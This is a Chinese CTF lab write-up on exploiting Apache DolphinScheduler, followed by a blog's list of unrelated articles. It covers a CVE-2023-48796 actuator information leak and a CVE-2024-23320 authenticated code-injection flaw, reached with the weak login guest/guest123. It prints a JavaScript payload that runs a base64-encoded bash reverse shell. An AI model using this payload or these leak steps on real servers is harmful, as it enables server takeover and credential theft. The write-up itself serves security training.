NSS [NSSRound#18 Basic]easy_rw

NSS [NSSRound#18 Basic]easy_rw

题目描述:弱口令就完事了
入口:/dolphinscheduler
靶机启动需要1分钟。

这题有两种做法。CVE-2023-48796、CVE-2024-23320

先说CVE-2023-48796

Apache DolphinScheduler是一个分布式、易扩展、可视化的工作流任务调度平台,旨在解决大数据场景下复杂任务的调度和监控问题。支持数据抽取、数据处理、数据传输等丰富的任务类型,用户可以通过可视化的方式创建、监控和管理这些任务。DolphinScheduler提供了多租户、任务依赖、任务流程编排、告警通知、任务监控等丰富的功能特性,具有良好的扩展性和灵活性。近日,新华三盾山实验室监测到Apache官方发布了安全公告,修复了一个存在于Apache DolphinScheduler中的信息泄露漏洞(CVE-2023-48796),攻击者可利用该漏洞获取敏感信息。

漏洞信息:

Apache DolphinScheduler存在信息泄露漏洞,由于没有限制暴露的端点,导致所有端点全部暴露,未经身份验证的恶意攻击者通过访问其他端点获取获取敏感数据(如访问/actuator/configprops端点查看所有配置属性,可获取数据库凭证信息)。

/actuator是Actuator端点的默认路径前缀。在不同的Spring Boot版本和配置中,可用的端点可能会有所不同,但下面是一些常见的/actuator下的子端点及其用途:1. /actuator/health
提供应用的健康信息。可以显示应用是否处于运行状态以及各种健康指标的详情,比如数据库连接是否正常、磁盘空间是否足够等。2. /actuator/info
显示应用的基本信息,这些信息可以通过在application.properties或application.yml文件中配置info属性来自定义。3. /actuator/metrics
提供应用的详细指标,如内存使用情况、HTTP请求计数、线程池状态等。可以查询特定的指标来获取更细致的数据。4. /actuator/env
显示应用的环境属性,包括配置属性、系统环境变量、系统属性等。5. /actuator/loggers
允许查看和修改应用中日志记录器的配置,比如动态调整日志级别。6. /actuator/heapdump
提供一个JVM堆转储文件,可以用于深入分析应用的内存使用情况。7. /actuator/threaddump
提供当前应用的线程状态快照,有助于诊断死锁或其他线程问题。8. /actuator/auditevents
显示应用的审计事件信息,比如认证事件、访问决策等,前提是应用配置了审计功能。9. /actuator/caches
显示应用中缓存的详细信息,前提是应用使用了Spring Framework的缓存抽象。10. /actuator/scheduledtasks
列出应用中所有的定时任务信息。11. /actuator/httptrace
显示HTTP跟踪信息(比如最近的HTTP请求-响应交换),这取决于HttpTraceRepository的配置。

影响版本:

3.0.0<=Apache DolphinScheduler<3.0.2

开始做题,在/actuator/env找到了flag

image-20240729105124051

其实dirsearch也能扫出来的。

image-20240729112931598

然后说CVE-2024-23320

漏洞描述:

Apache DolphinScheduler是一个分布式、易扩展、可视化的工作流任务调度平台,旨在解决大数据场景下复杂任务的调度和监控问题。支持数据抽取、数据处理、数据传输等丰富的任务类型,用户可以通过可视化的方式创建、监控和管理这些任务。DolphinScheduler提供了多租户、任务依赖、任务流程编排、告警通知、任务监控等丰富的功能特性,具有良好的扩展性和灵活性。

Apache DolphinScheduler 在 3.2.1 之前版本中存在远程代码执行漏洞。由于系统对代码过滤不充分,经过身份认证的攻击者可以在服务器上进行远程代码执行,从而控制服务器。

受影响版本中,由于 SwitchTaskUtils#generateContentWithTaskParams 方法未对用户可控的任务参数有效过滤,攻击者可构造包含模版字符串(如:${cmd})或Unicode编码的恶意参数创建数据处理任务,当程序执行时会在服务器上执行任意可逃逸沙箱的 JavaScript 代码。

影响版本:

Apache DolphinScheduler < 3.2.1

开启环境开始复现:

image-20240729105623794

弱口令爆破出用户名密码guest/guest123

image-20240729105710381

创建项目

image-20240729110136371

进入项目创建工作流,在条件出填入类似${cmd}包裹的模板

image-20240729112204915

接着在运行时设置启动参数为之前的${}里面包裹的字符串,将值设置为js代码即可执行

";var a = mainOutput(); function mainOutput() { var x=java.lang.Runtime.getRuntime().exec("bash -c {echo,要执行的反弹shell命令的base64}|{base64,-d}|{bash,-i}")};//

image-20240729112553262

确定后接收到shell,flag在环境变量中

image-20240729112647478

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/pingmian/51314.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

MATLAB学习日志DAY22

MATLAB学习日志DAY22

动态字段名称 访问结构体中的数据的最常用方法是指定要引用的字段的名称。 访问结构体数据的另一种方法是使用动态字段名称。这些名称将字段表示为变量表达式&#xff0c;MATLAB 会在运行时计算这些表达式。此处显示的 点-括号 语法将 expression 作为动态字段名称&#xff1…
阅读更多...
【redis】一致性hash算法和hash槽

【redis】一致性hash算法和hash槽

普通hash取模 直接hash(key)%N , N为机器的数量&#xff0c;但不利于集器扩容或者缩容 一致性hash算法和hash槽 一致性hash算法是在redis 分片中使用&#xff0c;hash槽在redis cluster&#xff08;集群&#xff09;中使用 Redis一致性hash&#xff1a;Redis一致性hash是为…
阅读更多...
前端获取当前年月日时分秒

前端获取当前年月日时分秒

getCurrentTime() {//改时间数据格式var currentTime new Date();const formattedDate ${currentTime.getFullYear()}-${this.padZero(currentTime.getMonth() 1)}-${this.padZero(currentTime.getDate())} ${this.padZero(currentTime.getHours())}:${this.padZero(currentTi…
阅读更多...
Netdevops入门之Telnetlib语法案例

Netdevops入门之Telnetlib语法案例

1、Telnetlib模块&#xff1a; 支持telnet/ssh远程访问的模块很多&#xff0c;常见的有telnetlib、ciscolib、paramiko、netmiko、pexpect,其中telnetlib和ciscolib对应telnet协议&#xff0c;后面3个对应SSH协议。 ①-通过ENSP环境搭建实验环境 ②-基础语法-telnetlib案例1&…
阅读更多...
16现代循环神经网络—深度循环与双向循环

16现代循环神经网络—深度循环与双向循环

目录 1.深度循环神经网络回顾:循环神经网络总结简洁代码实现2.双向循环神经网络隐马尔可夫模型中的动态规划双向模型模型的计算代价及其应用总结代码实现1.深度循环神经网络 回顾:循环神经网络 如何将循环神经网络变深,以获得更多的非线性? 通过添加多个隐藏层的方式来实现…
阅读更多...
解决git每次push代码到github都需要输入用户名以及密码

解决git每次push代码到github都需要输入用户名以及密码

产生原因&#xff1a; 出现以上情况的主要原因在于采用的是 https 方式提交代码&#xff0c; 如果采用的是 ssh 方式只需要在版本库中添加用户的 sha 的key就可以实现提交时无需输入用户名和密码。 解决方法 在终端中使用以下命令删除原先已经建立的http的链接方式&#xff0c…
阅读更多...
KCache-go本地缓存,支持本地缓存过期、缓存过期自维护机制。

KCache-go本地缓存,支持本地缓存过期、缓存过期自维护机制。

GitHub - kocor01/kcache: go 本地缓存解决方案&#xff0c;支持本地缓存过期、缓存过期自维护机制。 最近系统并发很高&#xff0c;单接口10W的 QPS&#xff0c;对 redis 压力很大&#xff0c;大量的热KEY导致 redis 分片CPU资源经常告警。计划用 go 本地缓存缓解 redis 的压…
阅读更多...
git实践汇总【配置+日常使用+问题解决】

git实践汇总【配置+日常使用+问题解决】

**最初配置步骤&#xff1a;** git config --global user.name "yournemae" git config --global user.email "yourmail" git config -l ssh-keygen -t rsa -C “xxx.xxxx.EXTcccc.com” git config --global ssh.variant ssh $ git clone git仓库路径 git…
阅读更多...
洗地机哪家好?四款洗地机好洗地机的品牌推荐

洗地机哪家好?四款洗地机好洗地机的品牌推荐

随着“懒人经济”的兴起&#xff0c;洗地机作为家居清洁领域的革新者&#xff0c;正逐步融入越来越多家庭的生活之中。面对市场上繁多的洗地机品牌与型号&#xff0c;消费者往往感到难以抉择&#xff1a;“洗地机哪个牌子最佳&#xff1f;”为了解答这一疑问&#xff0c;本文精…
阅读更多...
KubeSphere介绍及一键安装k8s

KubeSphere介绍及一键安装k8s

KubeSphere介绍 官网地址&#xff1a;https://kubesphere.io/zh/ KubeSphere愿景是打造一个以 Kubernetes 为内核的云原生分布式操作系统&#xff0c;它的架构可以非常方便地使第三方应用与云原生生态组件进行即插即用&#xff08;plug-and-play&#xff09;的集成&#xff0…
阅读更多...
C++ --> string类模拟实现(附源码)

C++ --> string类模拟实现(附源码)

欢迎来到我的Blog&#xff0c;点击关注哦&#x1f495; 前言&#xff1a; C中STL扮演着极其重要的角色&#xff0c;学习C重中之重的就是学习STL&#xff0c;虽然string不作为containers的其中一员&#xff0c;但是也是值得学习的le类。下面就进行string的模拟实现 string的模拟…
阅读更多...
C++ | Leetcode C++题解之第284题窥视迭代器

C++ | Leetcode C++题解之第284题窥视迭代器

题目&#xff1a; 题解&#xff1a; template <class T> class PeekingIterator : public Iterator<T> { public:PeekingIterator(const vector<T>& nums) : Iterator<T>(nums) {flag Iterator<T>::hasNext();if (flag) {nextElement Ite…
阅读更多...
docker 的常用命令随笔

docker 的常用命令随笔

sudo docker --help docker build -t demo:v1 systemctl start docker service docker start sudo docker ps -a sudo docker images sudo docker restart xx&#xff08;容器名&#xff09; sudo docker exec -it xxx (容器名) bash sudo docker run -it xxx:xx(镜…
阅读更多...
【MyBatis】基础操作

【MyBatis】基础操作

准备工作 准备数据库表创建 springboot工程&#xff0c;选择引入对应的起步依赖&#xff08;mybatis、mysql驱动、lombok&#xff09;application.properties中引入数据库连接信息创建对应的实体类 Emp&#xff08;实体类属性采用驼峰命名&#xff09;准备Mapper接口 EmpMappe…
阅读更多...
【C语言】队列的实现(数据结构)

【C语言】队列的实现(数据结构)

前言&#xff1a; 相信大家在生活中经常排队买东西&#xff0c;今天学习的队列就跟排队买东西一样&#xff0c;先来买的人就买完先走&#xff0c;也就是先进先出。废话不多说&#xff0c;进入咱们今天的学习吧。 目录 前言&#xff1a; 队列的概念 队列的实现 队列的定义 …
阅读更多...
【es】多个中文无法模糊查询

【es】多个中文无法模糊查询

es 的 text类型字段会分词处理&#xff0c;模糊查询有单个中文能查&#xff0c;多个中文就不行了 改为keyword类型 ES模糊查询失效的坑以及解决方案_java_脚本之家
阅读更多...
DDR等长,到底长度差多少叫等长?

DDR等长,到底长度差多少叫等长?

DDR4看这一篇就够了 - 知乎 (zhihu.com) 【全网首发】DDR4 PCB设计规范&设计要点PCB资源PCB联盟网 - Powered by Discuz! (pcbbar.com) 终于看到较为权威的DDR4等长要求了: !!!! 依据这个要求&#xff0c;H616项目的等长线不合格&#xff1a;
阅读更多...
C/S架构和B/C架构

C/S架构和B/C架构

C/S架构&#xff08;Client/Server Architecture&#xff09;和B/C架构&#xff08;Browser/Client Architecture&#xff09;是两种不同 的软件架构模型&#xff0c;它们各自有不同的特点和应用场景。 一、C/S架构&#xff08;Client/Server Architecture&#xff09; 1. 定…
阅读更多...
Vue的指令语法、双向绑定、el和data的另一种写法、MVVM模型

Vue的指令语法、双向绑定、el和data的另一种写法、MVVM模型

目录 1. 指令语法1.1 双向绑定 2. el和data的另一种写法3. MVVM模型 1. 指令语法 用于解析标签&#xff08;包括&#xff1a;标签属性、标签体内容、绑定事件…&#xff09;。Vue中有很多的指令&#xff0c;且形式都是&#xff1a;v-xxxx&#xff0c;此处我们只是拿v-bind举个…
阅读更多...
C++第二十八弹---进一步理解模板:特化和分离编译

C++第二十八弹---进一步理解模板:特化和分离编译

✨个人主页&#xff1a; 熬夜学编程的小林 &#x1f497;系列专栏&#xff1a; 【C语言详解】 【数据结构详解】【C详解】 目录 1. 非类型模板参数 2. 模板的特化 2.1 概念 2.2 函数模板特化 2.3 类模板特化 2.3.1 全特化 2.3.2 偏特化 2.3.3 类模板特化应用示例 3. …
阅读更多...
最新文章

Copyright @ 2022~2023